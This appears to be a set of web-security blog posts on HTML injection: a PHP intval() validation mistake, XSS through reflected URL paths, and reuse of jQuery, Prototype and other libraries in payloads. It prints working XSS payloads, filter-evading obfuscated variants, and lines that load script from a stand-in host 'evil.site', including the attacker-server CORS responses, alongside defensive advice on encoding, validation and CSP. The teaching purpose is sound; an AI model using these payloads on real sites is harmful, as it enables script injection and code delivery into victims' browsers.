Modern PHP has successfully shed many of the problematic functions and features that contributed to the poor security reputation the language earned in its early days. Settings like `safe_mode` misled developers about what was really being made "safe", and `magic_quotes` caused unending headaches. And naive developers caused more security problems because they knew just enough to throw some code together, but not enough to understand the implications of blindly trusting data from the browser.

In some cases, the language tried to help developers: prepared statements are an excellent counter to SQL injection attacks. The catch is that developers actually have to use them. In other cases, the language's quirks weakened code. For example, `register_globals` allowed attackers to define uninitialized values (among other things), and settings like `magic_quotes` might be enabled or disabled by a server setting, which made deployment unpredictable.

But the language alone isn’t to blame. Developers make mistakes, both subtle and simple. These mistakes inevitably lead to vulns like our ever-favorite HTML injection.

Consider the `intval()` function. It's a typical PHP function in the sense that it has one argument that accepts mixed types and a second argument with a default value (the base used in the numeric conversion from string to integer):

```php
int intval ( mixed $var , int $base = 10 )
```

The function returns the integer representation of `$var` (or "casts it to an int" in more type-safe programming parlance). If `$var` cannot be cast to an integer, then the function returns 0. (Confusingly, if `$var` is an object type, then the function returns 1.)

Using `intval()` is a great way to get a "safe" number from a request parameter. Safe in the sense that the value should either be 0 or an integer representable on the platform. Pesky characters like apostrophes or angle brackets that show up in injection attacks will disappear, or at least they should.

The problem is that you must be careful if you commingle the newly cast integer value with the raw `$var` that went into the function. Otherwise, you may end up with an HTML injection vuln, along with some moments of confusion in finding the problem in the first place.

The following code is a trivial example condensed from a web page in the wild:

```php
<?php
$s = isset($_GET['s']) ? $_GET['s'] : '';
$n = intval($s);
$val = $n > 0 ? $s : '';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<form>
<input type="text" name="s" value="<?php print $val;?>"><br>
<input type="submit">
</form>
</body>
</html>
```

At first glance, a developer might assume this to be safe from HTML injection. Especially if they test the code with a simple payload:

```
https://web.site/intval.php?s="><script>alert(9)</script>
```

As a consequence of the non-numeric payload, `intval()` has nothing to cast to an integer, so the greater-than-zero check fails and the code path sets `$val` to an empty string. Such security is short-lived. Try the following link:

```
https://web.site/intval.php?s=19"><script>alert(9)</script>
```

With the new payload, `intval()` returns 19 and the original parameter gets written into the page. The programming mistake is clear: don't rely on `intval()` to act as your validation filter and then fall back to using the original parameter value.

Since we're on the subject of PHP, we'll take a moment to explore some nuances of its parameter handling. The following behaviors have no direct bearing on the HTML injection example, but you should be aware of them since they could come in handy for different situations.

One idiosyncrasy of PHP is the relation of URL parameters to superglobals and arrays. Superglobals are request variables like `$_GET`, `$_POST`, and `$_REQUEST` that contain arrays of parameters. Arrays are actually containers of key/value pairs whose keys or values may be extracted independently (they are implemented as an ordered map).

It's the array type that often surprises developers. Surprise is undesirable in secure software. With this in mind, let's return to the example. The following link has turned the `s` parameter into an array:

```
https://web.site/intval.php?s[]=19
```

The sample code will print `Array` in the form field because `intval()` returns 1 for a non-empty array.

We could define the array with several tricks, such as an indexed array (i.e. integer indices):

```
https://web.site/intval.php?s[0]=19&s[1]=42
https://web.site/intval.php?s[0][0]=19
```

Note that we can't pull off any clever memory-hogging attacks using large indices. PHP won't allocate space for missing elements since the underlying container is really a map.

```
https://web.site/intval.php?s[0]=19&s[4294967295]=42
```

This also implies that we can create negative indices:

```
https://web.site/intval.php?s[-1]=19
```

Or we can create an array with named keys:

```
https://web.site/intval.php?s["a"]=19
https://web.site/intval.php?s["<script>"]=19
```

For the moment, we'll leave the "parameter array" examples as trivia about the PHP language. However, just as it's good to understand how a function like `intval()` handles mixed-type input to produce an integer output, it's good to understand how a parameter can be promoted from a single value to an array.

The `intval()` example is specific to PHP, but the issue represents broader concepts around input validation that apply to programming in general:

First, when passing any data through a filter or conversion, make sure to consistently use the "new" form of the data and throw away the "raw" input. If you find your code switching between the two, reconsider why it apparently needs to do so.
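The same trap exists outside PHP. As a rough sketch in JavaScript, with `parseInt()` standing in for `intval()` and two hypothetical helper names, the difference between mixing raw and converted values and keeping only the converted one might look like this:

```javascript
// Sketch only: parseInt() stands in for PHP's intval(); both turn "19abc" into 19.
// fieldValueVulnerable and fieldValueSafe are hypothetical names for illustration.

// Mirrors the mistake: check the converted number, then emit the raw string.
function fieldValueVulnerable(raw) {
  const n = parseInt(raw, 10);
  return n > 0 ? raw : '';
}

// Keeps only the converted form; the raw input never reaches the page.
function fieldValueSafe(raw) {
  const n = parseInt(raw, 10);
  return Number.isInteger(n) && n > 0 ? String(n) : '';
}

const payload = '19"><script>alert(9)</script>';
console.log(fieldValueVulnerable(payload)); // the whole payload survives
console.log(fieldValueSafe(payload));       // 19
```

Once the conversion has happened, nothing downstream needs the original string, so the safe version never returns it.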

Second, make sure a security filter inspects the entirety of a value. This covers things like making sure validation regexes are anchored to the beginning and end of input, or being strict with string comparisons.
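To illustrate the anchoring point, here is a small JavaScript sketch. The patterns and the `isWholeNumber` helper are assumptions made for the example, not code from any particular app:

```javascript
// Sketch only: the patterns and the isWholeNumber helper are illustrative assumptions.

const unanchored = /\d+/;  // matches if digits appear anywhere in the value
const anchored = /^\d+$/;  // matches only if the entire value is digits

function isWholeNumber(value) {
  // Reject non-strings outright so arrays or objects are never coerced into a match.
  return typeof value === 'string' && anchored.test(value);
}

const payload = '19"><script>alert(9)</script>';
console.log(unanchored.test(payload)); // true
console.log(isWholeNumber(payload));   // false
console.log(isWholeNumber('19'));      // true
```

The unanchored pattern only confirms that a number exists somewhere in the input; it says nothing about what surrounds it.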

Third, decide on a consistent policy for dealing with invalid data. The `intval()` function is convenient for converting to integers; it makes it easy to take strings like "19", "19abc", or "abc" and turn them into 19, 19, or 0. But you may wish to treat data that contains non-numeric characters with more suspicion. Plus, fixing up data like "19abc" into 19 is hazardous when applied to strings. The simplest example is stripping a word like "script" to defeat HTML injection attacks; it misses a payload like "<scrscriptipt>".

• • •

URLs guide us through the trails among web apps. We follow their components – schemes, hosts, ports, querystrings – like breadcrumbs. They lead to the bright meadows of content. They lead to the dark thickets of forgotten pages. Our browsers must recognize when those crumbs take us to infestations of malware and phishing.

And developers must recognize how those crumbs lure dangerous beasts to their sites.

The apparently obvious components of URLs (the aforementioned origins, paths, and parameters) entail obvious methods of testing. Phishers squat on FQDN typos and IDN homoglyphs. Other attackers guess alternate paths, looking for `/admin` directories and backup files. Others deliver SQL injection and HTML injection (aka cross-site scripting) payloads into querystring parameters.

But URLs are not always what they seem. Forward slashes don't always denote directories. Web apps might decompose a path into parameters passed into backend servers. Hence, it's important to pay attention to how apps handle links.

A common behavior for web apps is to reflect URLs within pages. In the following example, we've requested a link, `https://web.site/en/dir/o/80/loch`, which shows up in the HTML response like this:

```html
<link rel="canonical" href="https://web.site/en/dir/o/80/loch" />
```

There's no querystring parameter to test, but there are still plenty of items to manipulate. Imagine a mod_rewrite rule that turns ostensible path components into querystring name/value pairs. A link like `https://web.site/en/dir/o/80/loch` might become `https://web.site/en/dir?o=80&foo=loch` within the site's nether realms.

We can also dump HTML injection payloads directly into the path. The URL shows up in a quoted string, so the first step could be trying to break out of that enclosure:

```
https://web.site/en/dir/o/80/loch%22onmouseover=alert(9);%22
```

The app neglects to filter the payload, although it does transform the quotation marks with HTML encoding. There's no escape from this particular path of injection:

```html
<link rel="canonical" href="https://web.site/en/dir/o/80/loch&quot;onmouseover=alert(9);&quot;" />
```

However, if you've been reading here often, then you'll know by now that we should keep looking. If we search further down the page, a familiar vuln scenario greets us. (As an aside, note the app's usage of two-letter language codes like `en` and `de`; sometimes that's a successful attack vector.) As always, partial security is complete insecurity.

```html
<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=alert(9);"?kosid=80&type=0&step=1">Deutsch</a>
</div>
```

We probe the injection vector and discover that the app redirects to an error page if characters like `<` or `>` appear in the URL:

```
Please tell us ([email protected]) how and on which page this error occurred.
```

The error also triggers on invalid UTF-8 sequences and NULL (`%00`) characters. So, there's evidence of some filtering. That basic filter prevents us from dropping in a `<script>` tag to load external resources. It also foils character encoding tricks to confuse and bypass the filters.

Popular HTML injection examples have relied on `<script>` tags for years. Don't let that limit your creativity.

Remember that the rise of sophisticated web apps has meant that complex JavaScript libraries like jQuery have become pervasive. Hence, we can leverage JavaScript that's already present to pull off attacks like this:

```
https://web.site/en/dir/o/80/loch"onmouseover=$.get("//evil.site/");"
```

```html
<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=$.get("//evil.site/");"?kosid=80&type=0&step=1">Deutsch</a>
</div>
```

We're still relying on the `mouseover` event and therefore need the victim to interact with the web page to trigger the payload's activity. The payload hasn't been injected into a form field, so the HTML5 `autofocus`/`onfocus` trick won't work.

We could further obfuscate the payload in case some other kind of filter is present:

```
https://web.site/en/dir/o/80/loch"onmouseover=$["get"]("//evil.site/");"
https://web.site/en/dir/o/80/loch"onmouseover=$["g"%2b"et"]("htt"%2b"p://"%2b"evil.site/");"
```

Parameter validation and context-specific output encoding are two primary countermeasures for HTML injection attacks. The techniques complement each other: effective validation prevents malicious payloads from entering an app, and correct encoding prevents a payload from changing a page's DOM. With luck, an error in one will be compensated by the other. But it's a bad idea to rely on luck, especially when there are so many potential errors to make.
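As a minimal sketch of output encoding for one context, a quoted HTML attribute, consider the following JavaScript. The `escapeHtmlAttr` and `canonicalLink` helpers are hypothetical; nothing here is the app's actual code, and other contexts (JavaScript strings, URLs, CSS) would need their own encoders.

```javascript
// Sketch only: escapeHtmlAttr and canonicalLink are hypothetical helpers.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode the characters that can change markup inside a quoted attribute value.
function escapeHtmlAttr(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Every place that reflects the request path should pass through the same encoder.
function canonicalLink(path) {
  return `<link rel="canonical" href="https://web.site${escapeHtmlAttr(path)}" />`;
}

console.log(canonicalLink('/en/dir/o/80/loch"onmouseover=alert(9);"'));
```

The encoder itself is the easy part. The example site evidently had something like it for the canonical link and still skipped it when building the language-switch anchor.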

Two weaknesses enable attackers to shortcut what should be secure paths through a web app:

- Validation routines must be applied to all incoming data, not just parameters. Form fields and querystring parameters may be the most notorious attack vectors, but they’re not the only ones. Request headers and URL components are just as easy to manipulate.

- Deny lists fail because developers don't anticipate the various ways of crafting exploits. Even worse are filters built solely from observing automated tools, which leads to naive defenses like blocking `alert` or `<script>`.
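To see how little such a deny list buys, here is a deliberately naive JavaScript sketch. The filter and both helper names are invented for illustration; the payloads are the ones used in these examples.

```javascript
// Sketch only: a deliberately naive deny list; passesDenyList and stripWord are hypothetical.
const DENY_LIST = [/alert/i, /<script>/i];

function passesDenyList(input) {
  return !DENY_LIST.some((pattern) => pattern.test(input));
}

// "Fixing up" input by deleting a forbidden word is no better than blocking it.
function stripWord(input) {
  return input.replace(/script/gi, '');
}

const blocked = '"><script>alert(9)</script>';
const missed = '"onmouseover=$.get("//evil.site/");"';

console.log(passesDenyList(blocked));     // false: the textbook payload is caught
console.log(passesDenyList(missed));      // true: no <script>, no alert, still an injection
console.log(stripWord('<scrscriptipt>')); // <script>
```

Both failures share a cause: the filter describes what one attack looked like rather than what valid input looks like.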

Output encoding must be applied consistently. It’s one thing to have designed a strong function for inserting text into a web page; it’s another to make sure it’s implemented throughout the app. Attackers are going to follow these breadcrumbs through your app.

Be careful, lest they eat a few along the way.

• • •

In 1st edition AD&D two character classes had their own private languages: Druids and Thieves. Thus, a character could speak in Thieves’ Cant to identify peers, bargain, threaten, or otherwise discuss malevolent matters with a degree of secrecy. (Of course, Magic-Users had that troublesome first level spell comprehend languages, and Assassins of 9th level or higher could learn secret or alignment languages forbidden to others.)

Thieves rely on subterfuge (and high DEX) to avoid unpleasant ends. Shakespeare didn't make it into the list of inspirational reading in Appendix N of the DMG. Even so, consider in Henry VI, Part II, how Humphrey, Duke of Gloucester (the Lord Protector, not the later Richard III), defends his treatment of certain subjects, with two notable exceptions:

Unless it were a bloody murderer,

Or foul felonious thief that fleec’d poor passengers,

I never gave them condign punishment.

Developers have their own spoken language for discussing code and coding styles. They litter conversations with terms of art like patterns and anti-patterns, which serve as shorthand for design concepts or litanies of caution. One such pattern is Don’t Repeat Yourself (DRY), of which Code Reuse is a lesser manifestation.

Hackers code, too.

The most boring of HTML injection examples is to display an `alert()` message. The second most boring is to insert the `document.cookie` value into a request. But this is the era of HTML5 and roses; hackers need look no further than a vulnerable Same Origin to find useful JavaScript libraries and functions.

There are two important reasons for taking advantage of DRY in a web hack:

- Avoid inadequate deny lists (which is really a redundant term).

- Leverage code that already exists.

Keep in mind that none of the following hacks are flaws of their respective JavaScript library. The target is assumed to have an HTML injection vulnerability – our goal is to take advantage of code already present on the hacked site in order to minimize our effort.

For example, imagine an HTML injection vulnerability in a site that uses the AngularJS library. The attacker could use a payload like:

```javascript
angular.bind(self, alert, 9)()
```

In Ember.js the payload might look like:

```javascript
Ember.run(null, alert, 9)
```

The pervasive jQuery might have a string like:

```javascript
$.globalEval(alert(9))
```

And the Underscore library might be leveraged with:

```javascript
_.defer(alert, 9)
```

These are nice tricks. They might seem to do little more than offer fancy ways of triggering an `alert()` message, but the code is trivially modifiable to a more lethal version worthy of a vorpal blade.

More importantly, these libraries provide the means to load (and execute!) JavaScript from a different origin. After all, browsers don't really know the difference between a CDN and a malicious domain.

The jQuery library provides a few ways to obtain code:

```javascript
$.get('//evil.site/')
$('#selector').load('//evil.site')
```

Prototype has an `Ajax` object. It will load and execute code from a call like:

```javascript
new Ajax.Request('//evil.site/')
```

But this has a catch: the request includes "non-simple" headers via the XHR object and therefore triggers a CORS pre-flight check in modern browsers. An invalid pre-flight response will cause the attack to fail. Cross-Origin Resource Sharing is never a problem when you're the one sharing the resource.
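The "non-simple" distinction can be approximated in a few lines. The following JavaScript is a simplified sketch of the decision a browser makes, not the full algorithm; real browsers apply additional rules (limits on header values, the `Range` header, upload listeners), and the `needsPreflight` name is made up for this example.

```javascript
// Sketch only: a simplified approximation of the browser's pre-flight decision.

const SIMPLE_METHODS = new Set(['GET', 'HEAD', 'POST']);
const SIMPLE_HEADERS = new Set(['accept', 'accept-language', 'content-language', 'content-type']);
const SIMPLE_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);

function needsPreflight(method, headers) {
  if (!SIMPLE_METHODS.has(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!SIMPLE_HEADERS.has(lower)) return true; // e.g. X-Requested-With
    if (lower === 'content-type') {
      const mime = value.split(';')[0].trim().toLowerCase();
      if (!SIMPLE_CONTENT_TYPES.has(mime)) return true;
    }
  }
  return false;
}

// Headers that Prototype's Ajax.Request adds in the request captured for this example.
const prototypeHeaders = {
  'X-Requested-With': 'XMLHttpRequest',
  'X-Prototype-Version': '1.7.1',
  'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
};

console.log(needsPreflight('POST', prototypeHeaders)); // true
console.log(needsPreflight('GET', prototypeHeaders));  // true: the X- headers remain
console.log(needsPreflight('GET', {}));                // false
```

The method is not what matters here. The custom `X-` headers alone are enough to force the pre-flight.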

In the Prototype `Ajax` example, a browser's pre-flight might look like the following. The initiating request comes from a link we'll call `https://web.site/xss_vuln.page`.

```
OPTIONS https://evil.site/ HTTP/1.1
Host: evil.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Origin: https://web.site
Access-Control-Request-Method: POST
Access-Control-Request-Headers: x-prototype-version,x-requested-with
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-length: 0
```

As someone with influence over the content served by evil.site, it's easy to let the browser know that this incoming cross-origin XHR request is perfectly fine. Hence, we craft some code to respond with the appropriate headers:

```
HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
Access-Control-Allow-Origin: https://web.site
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
```

With that out of the way, the browser continues its merry way to the cursed resource. We've done nothing to change the default behavior of the `Ajax` object, so it produces a POST. (Changing the method to GET would not have avoided the CORS pre-flight because the request would have still included custom `X-` headers.)

```
POST https://evil.site/HWA/ch2/cors_payload.php HTTP/1.1
Host: evil.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://web.site/HWA/ch2/prototype_xss.php
Content-Length: 0
Origin: https://web.site
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
```

Finally, our site responds with CORS headers intact and a payload to be executed. We'll be even lazier and tell the browser to cache the CORS response so it'll skip subsequent pre-flights for a while.

```
HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
X-Powered-By: PHP/5.3.26
Access-Control-Allow-Origin: https://web.site
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Access-Control-Max-Age: 86400
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

alert(9);
```

Okay. So, it's another `alert()` message. I suppose I've repeated myself enough on that topic for now.
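For completeness, the header logic behind those two responses might be sketched as follows. The original server ran PHP and its code isn't shown, so this JavaScript is only an assumption about its shape; `corsHeaders` and `respond` are hypothetical names, and no real framework is implied.

```javascript
// Sketch only: corsHeaders and respond are hypothetical helpers, not the original PHP.

const ALLOWED_ORIGIN = 'https://web.site'; // the site issuing the cross-origin XHR

// CORS header values copied from the responses shown in this example.
function corsHeaders() {
  return {
    'Access-Control-Allow-Origin': ALLOWED_ORIGIN,
    'Access-Control-Allow-Methods': 'GET, POST',
    'Access-Control-Allow-Headers': 'x-json,x-prototype-version,x-requested-with',
    'Access-Control-Expose-Headers': 'x-json',
    'Access-Control-Max-Age': '86400', // ask the browser to cache the pre-flight for a day
  };
}

// A pre-flight (OPTIONS) gets headers and an empty body; anything else gets the script.
function respond(method) {
  if (method === 'OPTIONS') {
    return { status: 200, headers: corsHeaders(), body: '' };
  }
  return {
    status: 200,
    headers: { ...corsHeaders(), 'Content-Type': 'application/javascript; charset=utf-8' },
    body: 'alert(9);',
  };
}

console.log(respond('OPTIONS').headers['Access-Control-Allow-Origin']); // https://web.site
console.log(respond('POST').body);                                      // alert(9);
```

Browsers read `Access-Control-Max-Age` from the pre-flight response, so the sketch sends it on the `OPTIONS` reply as well as on the final one.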



It should be noted that Content Security Policy just might help you in this situation. The catch is that you need to have architected your site to remove all inline JavaScript. That's not always an easy feat. Even experienced developers of major libraries like jQuery are struggling to create CSP-compatible content. Nevertheless, auditing and improving code for CSP is a worthwhile endeavor. Even 1st level thieves only have a 20% chance to Find/Remove Traps. The chance doesn't hit 50% until 7th level. Improvement takes time.

And the price for failure? Well, it turns out condign punishment has its own API.

• • •